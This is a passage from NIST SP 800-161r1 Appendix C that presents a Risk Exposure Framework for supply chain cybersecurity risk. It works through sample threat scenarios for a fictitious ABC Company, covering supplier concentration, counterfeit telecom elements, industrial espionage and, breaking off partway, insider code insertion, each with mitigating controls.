This appendix provides an example of a Risk Exposure Framework for C-SCRM that can be
used by enterprises to develop a tailored Risk Exposure Framework for potential and identified
threats that best suits their needs. It contains six examples of how this framework may be used.
The examples differ slightly in their implementation of the framework so as to show how the
38 Departments and agencies should refer to Appendix F to implement this guidance in accordance with Executive Order 14028, Improving the
Nation’s Cybersecurity.
39 Additional example threat scenarios and threat lists can be found in the ICT SCRM Task Force: Threat Scenarios Report (v3), August 2021,
https://www.cisa.gov/sites/default/files/publications/ict-scrm-task-force-threat-scenarios-report-v3.pdf. This report leveraged the 2015 version of
NIST SP 800-161.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
167
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
framework may be tailored by an enterprise. Each example identifies one or more vulnerabilities,
describes a specific threat source, identifies the expected impact on the enterprise, and proposes
[SP 800-161, Rev. 1] C-SCRM controls that would help mitigate the resulting risk.
RISK EXPOSURE FRAMEWORK
Step 1: Create a Plan for Developing and Analyzing Threat Scenarios
• Identify the purpose of the threat scenario analysis in terms of the objectives, milestones,
and expected deliverables.
• Identify the scope of enterprise applicability, level of detail, and other constraints.
• Identify resources to be used, including personnel, time, and equipment.
• Define a Risk Exposure Framework to be used for analyzing scenarios.
Step 2: Characterize the Environment
• Identify core mission and business processes and key enterprise dependencies.
• Describe threat sources that are relevant to the enterprise. Include the motivation and
resources available to the threat source, if applicable.
• List known vulnerabilities or areas of concern. (Note: Areas of concern include the
planned outsourcing of a manufacturing plant, the pending termination of a maintenance
contract, or the discontinued manufacture of an element).
• Identify existing and planned controls.
• Identify related regulations, standards, policies, and procedures.
• Define an acceptable level of risk (risk threshold) per the enterprise’s assessment of
Tactics, Techniques, and Procedures (TTPs); system criticality; and a risk owner’s set of
mission or business priorities. The level of risk or risk threshold can be periodically
revisited and adjusted to reflect the elasticity of the global supply chain, enterprise
changes, and new mission priorities.
Step 3: Develop and Select Threat Events for Analysis
• List possible ways that threat sources could exploit known vulnerabilities or impact areas
of concern to create a list of events. (Note: Historical data is useful for determining this
information.)
• Briefly outline the series of consequences that could occur as a result of each threat event.
These may be as broad or specific as necessary. If applicable, estimate the likelihood and
impact of each event.
• Eliminate those events that are clearly outside of the defined purpose and scope of the
analysis.
• In more detail, describe the remaining potential threat events. Include the TTPs that a
threat source may use to carry out attacks. (Note: The level of detail in the description is
dependent on the needs of the enterprise.)
• Select for analysis those events that best fit the defined purpose and scope of the analysis.
More likely or impactful events, areas of concern to the enterprise, and an event that can
represent several of the other listed events are generally useful candidates.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
168
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Step 4: Conduct an Analysis Using the Risk Exposure Framework
• For each threat event, note any immediate consequences of the event and identify those
enterprise units and processes that would be affected, taking into account applicable
regulations, standards, policies, and procedures; existing and planned controls; and the
extent to which those controls are able to effectively prevent, withstand, or otherwise
mitigate the harm that could result from the threat event.
• Estimate the impact that these consequences would have on the mission and business
processes, information, assets, enterprise units, and other stakeholders affected,
preferably in quantitative terms from historical data and taking into account existing and
planned controls and applicable regulations, standards, policies, and procedures. (Note: It
may be beneficial to identify a “most likely” impact level and a “worst-case” or “100-
year” impact level.)
• Identify those enterprise units, processes, information (access or flows), and/or assets that
may or would be subsequently affected, as well as the consequences and impact levels
until each affected critical item has been analyzed, taking into account existing and
planned controls and applicable regulations, standards, policies, and procedures (e.g., if a
critical server goes down, one of the first processes affected may be the technology
support department, but if they determine that a new part is needed to bring the server
back up, the procurement department may become involved).
Step 5: Determine C-SCRM Applicable Controls
• Determine if and which threat scenario events create a risk level that exceeds a risk
owner’s acceptable level of risk (risk threshold). (Note: In some cases, the level of
acceptable risk may be dependent on the capability to implement or the cost of mitigating
strategies.) Identify opportunities to strengthen existing controls or potential new
mitigating controls. Using a list of standards or recommended controls can simplify this
process. This appendix uses the controls in Appendix A of this document.
• Estimate the effectiveness of existing and planned controls at reducing the risk of a
scenario.
• Estimate the capability and resources needed (in terms of money, personnel, and time) to
implement potential new or strengthened controls.
• Identify those C-SCRM controls or combinations of C-SCRM controls that could cause
the estimated residual risk of a threat event to drop to an acceptable level in the most
resource-effective manner, taking into account any rules or regulations that may apply.
(Note: Consider the potential that one control will help mitigate the risk of more than one
event or that a control may increase the risk of a separate event.)
Step 6: Evaluate/Feedback
• Develop a plan to implement the selected controls and evaluate their effectiveness.
•
Evaluate the effectiveness of the Risk Exposure Framework, and make improvements as
needed.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
169
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Table C-1: Sample Risk Exposure Framework
Threat Scenario
Threat
Threat Event
Description
Describe possible ways that threat sources could exploit known
vulnerabilities or impact areas of concern to create a list of
events.
Threat event: An event or situation that has the potential for
causing undesirable consequences or impact.
Threat Event
Outcome
Describe the outcome of the threat event.
Threat Event Outcome: The effect that a threat acting upon a
vulnerability has on the confidentiality, integrity, and/or
availability of the enterprise’s operations, assets, and/or
individuals.
Enterprise units, processes,
information, assets, or
stakeholders affected
List the affected enterprise units, processes, information,
assets, or stakeholders affected.
Risk
Impact
Enter an estimate of impact, loss, or harm that would result
from the threat event materializing to affect the mission and
business processes, information assets, or stakeholders.
Estimates should preferably be provided in quantitative terms
based on historical data and should take into account existing
and planned controls and applicable regulations, standards,
policies, and procedures. (Note: It may be beneficial to identify
a “most likely” impact level and a “worst-case” or “100-year”
impact level.)
The effect on enterprise operations, enterprise assets,
individuals, other enterprises, or the Nation (including the
national security interests of the United States) of a loss of
confidentiality, integrity, or availability of information or a
system.
Likelihood
Enter the likelihood that a specific event or events may occur.
Likelihood: Chance of something happening
Risk Exposure
(Impact x Likelihood)
Enter the risk score by multiplying impact x likelihood.
A measure of the extent to which an entity is threatened
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
170
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
by a potential circumstance or event and typically a
function of: (i) the adverse impacts that would arise if the
circumstance or event occurs and (ii) the likelihood of
occurrence.
Acceptable Level of
Risk
Define an acceptable level of risk (risk threshold) per the
enterprise’s assessment of Tactics, Techniques, and Procedures
(TTPs); system criticality; risk appetite and tolerance; and a risk
owner’s set strategic goals and objectives.
Acceptable Risk: A level of residual risk to the enterprise’s
operations, assets, or individuals that falls within the risk
appetite and risk tolerance statements set by the enterprise.
Mitigation
Potential Mitigating
Strategies and C-
SCRM Controls
List the potential mitigating risk strategies and any relevant C-
SCRM controls.
C-SCRM Risk Mitigation: A systematic process for managing
exposures to cybersecurity risk in supply chains, threats, and
vulnerabilities throughout the supply chain and developing risk
response strategies to the cybersecurity risks throughout the
supply chain.
Estimated Cost of
Mitigating Strategies
Enter the estimated cost of risk mitigation strategies.
Change in Likelihood
Identify potential changes in likelihood.
Change in Impact
Identify potential changes in impact.
Selected Strategies
List selected strategies to reduce impact.
Estimated Residual
Risk
Enter the estimated amount of residual risk.
Residual Risk: The portion of risk that remains after security
measures have been applied.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
171
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
SAMPLE SCENARIOS
This appendix provides six example threat scenarios specific to the U.S. Government using a
fictitious ‘ABC Company’ and the Risk Exposure Framework described above. The examples
purposely vary in their level of specificity and detail to show that threat scenarios can be as
broad or specific – as detailed or generic – as necessary. While these scenarios use percentages
and basic scoring measures (i.e., High, Moderate, Low) for likelihood, impact, and risk,
enterprises may use any number of different units of measure (e.g., CVSS score). Additionally,
these scenarios vary slightly in their implementation of the risk response framework to show that
the Risk Exposure Framework can be adapted as needed.
SCENARIO 1: Influence or Control by Foreign Governments Over Suppliers40
Background
An enterprise has decided to perform a threat scenario analysis of its printed circuit board (PCB)
suppliers. The scenario will focus on the sensitivity of the business to unforeseen fluctuations in
component costs.
Threat Source
ABC Company designs, assembles, and ships 3.5 million personal computers per year. It has a
global footprint both in terms of customer and supply bases. Five years ago, in an effort to
reduce the cost of goods sold, ABC Company shifted a majority of its PCB procurement to
Southeast Asia. To avoid being single-sourced, ABC Company finalized agreements with five
different suppliers within the country and has enjoyed a positive partnership with each during
this time.
Vulnerability
Though sourcing from multiple vendors, ABC Company relies on suppliers in a single country
(i.e., Southeast Asia). This exposes ABC Company to geopolitical threats due to the potential for
policies of a single government to have a dramatic impact on the availability of supplied inputs.
Threat Event Description
The enterprise has established the following fictitious threat for the analysis exercise: Last year,
new leadership took over the government of the country where ABC Company does most of
their PCB business. This leadership has been focused on improving the financial and business
environment within the country, allowing larger firms who set up headquarters and other major
centers within the country advantages to do business more easily and cost-efficiently with
suppliers within the same region. However, in February of 2019, the now-corrupt regime passed
40 Scenario 1 prose is slightly modified (e.g., changed company names) from ICT SCRM Task Force: Threat Scenarios Report (v3), August 2021,
https://www.cisa.gov/sites/default/files/publications/ict-scrm-task-force-threat-scenarios-report-v3.pdf. This report leveraged the 2015 version of
NIST SP 800-161.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
172
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
new legislation that established an additional 20 % tax on all electronic components and goods
sold outside of the country. This new law was to take effect on June 1, 2019.
When the new law was announced, ABC Company’s current inventory of PCBs was about 10 %
of yearly demand, which was the typical inventory level with which they were comfortable.
Before June, ABC Company reached out to all five suppliers to order additional materials, but
there was quickly a shortage due to higher demand from many foreign customers of these
products. By June 1, the day that the new tax law took effect, ABC Company had reached an
inventory level of up to 15 % of yearly demand.
Outcome
Between February and June of 2019, ABC Company considered partnerships with new suppliers,
but there were several issues identified. One in every 10 new suppliers that ABC Company
contacted required a lead time for ramping up to the desired demand of anywhere from 6 months
to 18 months. This would have necessitated additional work on ABC Company’s part, including
testing samples of the supplier PCBs, finalizing logistical details, and monitoring supplier-side
activities, such as the procurement of raw materials and the acquisition of additional personnel
and production space that were necessary to meet the new demand.
The second issue was that the current contracts with all five suppliers in Southeast Asia involved
meeting minimum demand requirements, meaning that ABC Company was committed to
purchasing a minimum of 100,000 PCBs per month for the duration of the contracts, which
ranged anywhere from 3 months to 24 months in length. This would mean that ABC Company
could not easily avoid the cost implications of the new tax. Could ABC Company absorb the cost
of the PCBs? With a 20 % cost increase, this eroded the margins of a PC from 13.5 % down to
4.5 % on average. For some of the lower-margin ABC Company offerings, it would likely result
in discontinuing the line and using the more expensive PCBs on higher-end models that could
carry more margin.
Enterprise Units and Processes Affected
N/A
Potential Mitigating Strategies and C-SCRM Controls
• Perform regular assessments and reviews of supplier risk.41
• Diversify suppliers by immediate location, as well as by country, region, and other
factors.
• Build cost implications into supplier contracts, making it easier to part ways with
suppliers when costs rise too high (whether by fault of the supplier or otherwise).
• Adjust desired inventory levels to better account for an unexpected shortage of demand at
critical times.
41 The regular assessment and review of the supplier risk mitigating strategy was added to the original Scenario 1 text from the ICT SCRM Task
Force: Threat Scenarios Report (v3), August 2021, https://www.cisa.gov/sites/default/files/publications/ict-scrm-task-force-threat-scenarios-
report-v3.pdf. This report leveraged the 2015 version of NIST SP 800-161.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
173
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
• Employ more resources in countries or regions of critical suppliers with the intent to
source advanced notice of new legislation that may negatively affect business.
Table C-2: Scenario 1
Threat Scenario
Threat Source
Dynamic geopolitical conditions that impact the supply of
production components for PCs
Vulnerability
Geographical concentration of suppliers for a key production
component
Threat Event
Description
ABC Company shifted a majority of its printed circuit board
(PCB) procurement to Southeast Asia to reduce the cost of
goods sold. In an effort to avoid being single-sourced, ABC
Company finalized agreements with five different suppliers
within the country.
The country in which ABC Company conducts most of their PCB
business has seen a new regime assume governmental
authority. In February of 2019, this now-corrupt regime passed
legislation establishing an additional 20 % tax on all electronic
components and goods sold outside of the country. This law was
to take effect on June 1, 2019.
When the new law was announced, the current ABC Company
inventory of PCBs was about 10 % of yearly demand, at the
typical level of inventory with which they were comfortable.
Before June, ABC Company reached out to all five suppliers to
order additional materials, but there was quickly a shortage due
to the higher demand. By June 1, the day the new tax law took
effect, ABC Company had reached an inventory level up to 15 %
of annual demand.
Threat Event
Outcome
ABC Company also considered partnering with new suppliers,
but there were issues identified with this approach. One out of
every 10 new suppliers to which ABC Company reached out
required a lead time to ramp up to desired demand of anywhere
from 6 months to 18 months. Additionally, current contracts
with all five active suppliers in Southeast Asia stipulated
minimum demand requirements, meaning that ABC Company
was committed to purchasing a minimum of 100,000 PCBs per
month for the duration of the contracts, which ranged anywhere
from 3 months to 24 months in length. This would mean that
ABC Company could not easily avoid the cost implications of the
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
174
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
new tax. With a 20 % cost increase, the margins of a PC eroded
from 13.5 % to 4.5 %, on average.
Enterprise units / processes
affected
N/A
Risk
Impact
High: $40,000,000 decline in PC product line profit
Likelihood
Moderate: 10 % annualized probability of occurrence
Risk Exposure
(Impact x Likelihood)
High: Inherent Risk Exposure equal to approx. $4,000,000 in
product line profit
Acceptable Level of
Risk
No greater than 10 % probability of greater than $10,000,000 in
product line profit
Mitigation
Potential Mitigating
Strategies and C-SCRM
Controls
Assess and review supplier risk
to include FOCI [SR-6(1)],
employ supplier diversity
requirements [C-SCRM_PL-
3(1)], employ supplier diversity
[SCRM_PL-8(2)], and adjust
inventory levels [CM-8].
• Perform regular
assessments and reviews of
supplier risk.
• Diversify suppliers by
immediate location, as well
as by country, region, and
other factors.
• Build cost implications into
supplier contracts, making it
easier to walk away from
suppliers when costs rise
too high (whether it is the
fault of the supplier or not).
• Adjust desired inventory
levels to better account for
unexpected shortages of
demand at critical times.
• Employ more resources in
countries or regions of
critical suppliers with the
intent to source advanced
notice of new legislation
that may negatively affect
business.
Estimated Cost of
Mitigating Strategies
N/A
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
175
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Change in Likelihood
Low: 10 % probability of
occurrence
Change in Impact
Moderate: $2,000,000 in
product line profit
Selected Strategies
Combination of strategies using the mitigation noted
Estimated Residual
Risk
Low: Residual risk exposure 0.02 % of PC product line profit
margin
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
176
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
SCENARIO 2: Telecommunications Counterfeits
Background
A large enterprise, ABC Company, has developed a system that is maintained by contract with
an external integration company. The system requires a common telecommunications element
that is no longer available from the original equipment manufacturer (OEM). The OEM has
offered a newer product as a replacement, which would require modifications to the system at a
cost of approximately $1 million. If the element is not upgraded, the agency and system
integrator would have to rely on secondary market suppliers for replacements. The newer
product provides no significant improvement on the element currently being used.
ABC Company has decided to perform a threat scenario analysis to determine whether to modify
the system to accept the new product or accept the risk of continuing to use a product that is no
longer in production.
Environment
The environment is characterized as follows:
• The system is expected to last 10 more years without any major upgrades or
modifications and has a 99.9 % uptime requirement.
• Over 1,000 of the $200 elements are used throughout the system, and approximately 10
% are replaced every year due to regular wear-and-tear, malfunctions, or other reasons.
The integrator has an approximate 3-month supply on hand at any given time.
• The element is continuously monitored for functionality, and efficient procedures exist to
reroute traffic and replace the element should it unexpectedly fail.
• Outages resulting from the unexpected failure of the element are rare, localized, and last
only a few minutes. More frequently, when an element fails, the system’s functionality is
severely reduced for approximately one to four hours while the problem is diagnosed and
fixed or the element replaced.
• Products such as the element in question have been a common target for counterfeiting.
• The integrator has policies that restrict the purchase of counterfeit goods and a procedure
to follow if a counterfeit is discovered [Ref. SR-11].
• The integrator and acquiring agency have limited testing procedures to ensure
functionality of the element before acceptance [Ref. SR-5(2)].
Threat Event
To support the threat scenario, the agency created a fictitious threat source described as a group
motivated by profit with vast experience creating counterfeit solutions. The counterfeiter is able
to make a high profit margin by creating and selling the counterfeits, which are visually identical
to their genuine counterparts but use lower-quality materials. The counterfeiters have the
resources to copy most trademark and other identifying characteristics and insert counterfeits
into a supply chain commonly used by the enterprise with little to no risk of detection. The
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
177
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
counterfeit product is appealing to unaware purchasing authorities as it is generally offered at a
discount and sold as excess inventory or stockpile.
If an inferior quality element was inserted into the system, it would likely fail more often than
expected, causing reduced functionality of the system. In the event of a large number of
counterfeit products randomly integrating with genuine parts in the system, the number and
severity of unexpected outages could grow significantly. The agency and integrator decided that
the chances that a counterfeit product could be purchased to maintain the system and the
estimated potential impact of such an event were high enough to warrant further evaluation.
Threat Scenario Analysis
The person(s) who purchase the element from a supplier would be the first affected by a
counterfeit product. Policy requires that they attempt to purchase a genuine product from vetted
suppliers. This individual would have to be led to believe that the product is genuine. As the
counterfeit product in question is visually identical to the element desired and offered at a
discount, there is a high chance that the counterfeit will be purchased. One will be tested to
ensure functionality, and then the items will be placed into storage.
When one of the elements in the system needs to be replaced, an engineer will install a
counterfeit, quickly test to ensure that it is running properly, and record the change. It could take
two years for the counterfeit product to fail, and up to 200 counterfeit elements could be inserted
into the system before the first sign of failure. If all of the regularly replaced elements are
substituted for counterfeits and each counterfeit fails after two years, the cost of the system
would increase by $160,000 in 10 years. The requisite maintenance time would also cost the
integration company in personnel and other expenses.
When a counterfeit fails, it will take approximately one to four hours to diagnose and replace the
element. During this time, productivity is severely reduced. If more than one of the elements fails
at the same time, the system could fail entirely. This could cause significant damage to agency
operations and violate the 99.9 % uptime requirements set forth in the contract. Moreover, if it
becomes determined that the element failed because it was counterfeit, additional costs
associated with reporting the counterfeit would be incurred.
Mitigation Strategy
The following were identified as potential mitigating activities (from Appendix A of NIST SP
800-161, Rev. 1):
• Require developers to perform security testing/evaluation at all post‐design phases of the
SDLC [Ref. SA-11].
• Validate that the information system or system component received is genuine and has
not been altered [Ref. SR-11].
• Incorporate security requirements into the design of information systems (security
engineering) [Ref. PL-8, SC-36].
• Employ supplier diversity requirements [PL-8(2)].
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
178
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Based on these controls, the agency was able to devise a strategy that would include:
• Acceptance testing: The examination of elements to ensure that they are new, genuine,
and that all associated licenses are valid. Testing methods include, where appropriate,
physical inspection by trained personnel using digital imaging, digital signature
verification, serial/part number verification, and sample electrical testing.
• Increasing security requirements in the design of the system by adding redundant
elements along more critical paths (as determined by a criticality analysis) to minimize
the impact of an element failure.
• Search for alternative vetted suppliers/trusted components.
It was determined that this strategy would cost less than accepting the risk of allowing
counterfeits into the system or modifying the system to accept the upgraded element. The
estimated cost of implementing a more rigorous acquisition and testing program was $80,000.
The cost of increasing security engineering requirements was $100,000.
Table C-3: Scenario 2
Threat Scenario
Threat Source
Counterfeit telecommunications element introduced into supply
chain
Vulnerability
Element no longer produced by OEM
Purchasing authorities unable or unwilling to identify and
purchase only genuine elements
Threat Event
Description
The threat agent inserts their counterfeit element into a trusted
distribution chain. Purchasing authorities buy the counterfeit
element. Counterfeit elements are installed into the system.
Threat Event
Outcome
The element fails more frequently than before, increasing the
number of outages.
Enterprise units, processes,
information, assets, or
stakeholders affected
Acquisitions
Maintenance
OEM / supplier relations
Mission-essential functions
Risk
Impact
Moderate: Element failure leads to 1-4-hour system downtime
Likelihood
High: Significant motivation by threat actor and high
vulnerability due to the agency’s inability to detect counterfeits
with 25 % annualized probability of premature component
failure
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
179
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Risk Exposure (Impact
x Likelihood)
Medium: Significant short-term disruptions that lead downtime
to exceed uptime threshold by 0.5 % (e.g., 99.4 % < 99.9 %
requirement)
Acceptable Level of
Risk
Low: System must have less than 10 % annualized probability of
missing 99 % uptime thresholds
Mitigation
Potential Mitigating
Strategies and C-SCRM
Controls
Increase acceptance
testing capabilities [C-
SCRM_SA-9; C-SCRM_SA-
10] and security
requirements in the design
of systems [C-SCRM_PL-2,
and employ supplier
diversity requirements [C-
SCRM_PL-8(2)]
Modify the system to accept
element upgrade
Estimated Cost of
Mitigating Strategies
$180,000
$1 million
Change in Likelihood
Low: 8 % annualized probability of component failure
Change in Impact
Low: Element failure causes failover to redundant system
component – cost limited to maintenance and replacement
Selected Strategies
Agency-level examination and testing
Place elements in escrow until they pass defined acceptance
testing criteria
Increase security engineering
Search for multiple suppliers of the element
Estimated Residual
Risk
Low: 8% annualized probability of component failures leading to
system downtime (i.e., less than 99.9 % uptime)
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
180
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
SCENARIO 3: Industrial Espionage
Background
ABC Company, a semiconductor (SC) company used by the enterprise to produce military and
aerospace systems, is considering a partnership with a KXY Co. to leverage their fabrication
facility. This would represent a significant change in the supply chain related to a critical system
element. A committee was formed – including representatives from the enterprise, ABC
Company, and the integration company – to help identify the impacts that the partnership would
have on the enterprise and risk-appropriate mitigation practices to enact when the partnership is
completed.
Environment
The systems of concern are vital to the safety of military and aerospace missions. While not
classified, the element that KXY would be expected to manufacture is unique, patented, and
critical to the operational status of the systems. The loss of availability of the element while the
system is operational could have significant, immediate impacts across multiple agencies and the
civilian populous, including the loss of life and millions of dollars in damages. An initial risk
assessment was conducted using [NIST SP 800-30, Rev. 1], and the existing level of risk for this
was given a score of “Moderate.”
KXY currently produces a state-of-the-art, low-cost wafer fabrication with a primarily
commercial focus. The nation-state in which KXY operates has a history of conducting industrial
espionage to gain IP/technology. They have shown interest in semiconductor technology and
provided a significant grant to KXY to expand into the military and aerospace markets. While
KXY does not currently have the testing infrastructure to meet U.S. industry compliance
requirements, the nation-state’s resources are significant and include the ability to provide both
concessions and incentives to help KXY meet those requirements. The key area of concern is
that the nation-state in which KXY operates would be able to use its influence to gain access to
the element or the element’s design.
The committee reviewed the current mitigation strategies in place and determined that ABC
Company, the integration company, and the enterprise had several existing practices to ensure
that the system and all critical elements – as determined by a criticality analysis – met specific
functionality requirements. For example, the system and critical elements are determined to be
compliant with relevant industry standards. As part of their requirements under [NIST SP 800-
53, Rev. 5], the agency had some information protection requirements (Ref. PM-11). In addition,
ABC Company had a sophisticated inventory tracking system that required that most elements be
uniquely tagged using RFID technology or otherwise identified for traceability (Ref. SR-4).
Threat Scenario
Based on past experience, the enterprise decided that KXY’s host nation would likely perform
one of two actions if given access to the technology: 1) sell it to interested parties or 2) insert or
identify vulnerabilities for later exploitation. For either of these threat events to succeed, the host
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
181
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
nation would have to understand the purpose of the element and be given significant access to
the element or element’s design. This could be accomplished with the cooperation of KXY’s
human resources department, through deception, or by physical or electronic theft. Physical theft
would be difficult given existing physical control requirements and inventory control procedures.
For a modified element to be purchased and integrated with the system, it would need to pass
various testing procedures at both the integrator and agency levels. Testing methods currently
utilized include radiographic examination, material analysis, electrical testing, and sample
accelerated life testing. Modifications to identification labels or schemes would need to be
undetectable in a basic examination. In addition, KXY would need to pass routine audits, which
would check KXY’s processes for ensuring the quality and functionality of the element.
The committee decided that, despite existing practices, there was a 30 % chance that the host
nation would have the motivation and ability to develop harmful modifications to the element
without detection, exploit previously unknown vulnerabilities, or provide the means for one of
their allies to do the same. This could result in a loss of availability or integrity of the system,
causing significant harm. Using information from an initial risk assessment accomplished using
[NIST SP 800-30, Rev. 1], the committee identified this as the worst-case scenario with an
impact score of “High.”
There is an approximately 40 % chance that the host nation could and would sell the technology
to interested parties, resulting in a loss of technological superiority. If this scenario occurred,
friendly military and civilian lives could be at risk, intelligence operations would be damaged,
and more money would be required to invest in a new solution. The committee assigned an
impact score for this scenario of “Moderate.”
The committee determined that the overall combined risk exposure for the vulnerability of
concern was “High.”
Mitigating Strategies
Using Appendix A of NIST SP 800-161, Rev. 1 as a base, three broad strategies were identified
by the committee: (1) improve traceability capabilities, (2) increase provenance and information
requirements, and (3) choose another supplier. These three options were analyzed in more detail
to determine specific implementation strategies, their impact on the scenarios, and their
estimated cost to implement. (Specific technologies and techniques are not described in this case
but would be useful in an actual threat scenario evaluation.)
Improve traceability and monitoring capabilities:
• CM-8 – SYSTEM COMPONENT INVENTORY
• IA-1 – POLICY AND PROCEDURES
• SA-10 – DEVELOPER CONFIGURATION MANAGEMENT
• SR-8 – NOTIFICATION AGREEMENTS
• SR-4 – PROVENANCE
Cost = 20 % increase
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
182
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Impact = 10 % decrease
Increase provenance and information control requirements:
• AC-21 – INFORMATION SHARING
• SR-4 – PROVENANCE
Cost = 20 % increase
Impact = 20 % decrease
Choose another supplier:
• SR-6 – SUPPLIER ASSESSMENTS AND REVIEWS
Cost = 40 % increase
Impact = 80 % decrease
Based on this analysis, the committee decided to implement a combination of practices:
• Develop and require unique, difficult-to-copy labels or alter labels to discourage cloning
or modification of the component [Ref. SR-3(2)].
• Minimize the amount of information that is shared with suppliers. Require that the
information be secured [Ref. AC-21].
• Require that provenance be kept and updated throughout the SDLC [Ref. SR-4].
With this combination of controls, the estimated residual risk was determined to be equivalent to
the existing risk without the partnership at a cost increase that is less than if the enterprise had
changed suppliers.
Table C-4: Scenario 3
Threat Scenario
Threat Source
Nation-state with significant resources looking to steal IP
Vulnerability
Supplier considering partnership with company that has
relationship with threat source
Threat Event
Description
Nation-state helps KXY meet industry compliance
requirements, and
ABC Company partners with KXY to develop chips
Existing Practices
Strong contractual requirements as to the functionality of
the system and elements
Comprehensive inventory tracking system at ABC Company
Industry compliance requirements
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
183
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Threat Event Outcome
Nation-state extracts technology threat actor, modifies
technology, or exploits previously unknown vulnerability
Enterprise units, processes,
information, assets, or
stakeholders affected
KXY Supplier
ABC Company integrator functionality testing
Technology users
Other federal agencies / customers
Risk
Impact
Technology modified / vulnerabilities
exploited – High
Technology sold
to interested
parties –
Moderate
Likelihood
Moderate
Moderate
Risk exposure (Impact
x Likelihood)
High
Acceptable Level of
Risk
Moderate
Mitigation
Potential Mitigating
Strategies and C-SCRM
Controls
(1) Improve
traceability and
monitoring
capabilities
(2) Increase
provenance and
information
control
requirements
(3) Choose
another supplier
Estimated Cost of
Mitigating Strategies
20 % increase
20 % increase
40 % increase
Change in Likelihood
Moderate Low
Change in Impact
High Moderate
Selected Strategies
Develop and require unique, difficult-to-copy labels, or
alter labels to discourage cloning or modification of the
component [C-SCRM_PE-3].
Minimize the amount of information that is shared to
suppliers. Require that the information be secured [C-
SCRM AC-21].
Require provenance be kept and updated throughout the
SDLC [C-SCRM_SR-4].
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
184
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Estimated Residual
Risk
Moderate – The residual risk was determined to be
equivalent to the existing risk without the partnership.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
185
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
SCENARIO 4: Malicious Code Insertion
Background
ABC Company has decided to perform a threat scenario analysis on a traffic control system. The
scenario is to focus on software vulnerabilities and should provide general recommendations
regarding mitigating practices.
Environment
The system runs nearly automatically and uses computers that run a commonly available
operating system along with centralized servers. The software was created in-house and is
regularly maintained and updated by an integration company on contract for the next five years.
The integration company is large, frequently used by ABC Company in a variety of projects, and
has significant resources to ensure that the system maintains its high availability and integrity
requirements.
Threats to the system could include the loss of power to the system, loss of functionality, or loss
of integrity causing incorrect commands to be processed. Some threat sources could include
nature, malicious outsiders, and malicious insiders. The system is equipped with certain safety
controls, such as backup generator power, redundancy of design, and contingency plans if the
system fails.
Threat Event
ABC Company decided that the most concerning threat event would result from a malicious
insider compromising the integrity of the system. Possible attacks could include the threat actor
inserting a worm or a virus into the system, reducing its ability to function, or they could
manually control the system from one of the central servers or by creating a back door in the
server to be accessed remotely. Depending on the skillfulness of the attack, an insider could gain
control of the system, override certain fail-safes, and cause significant damage.
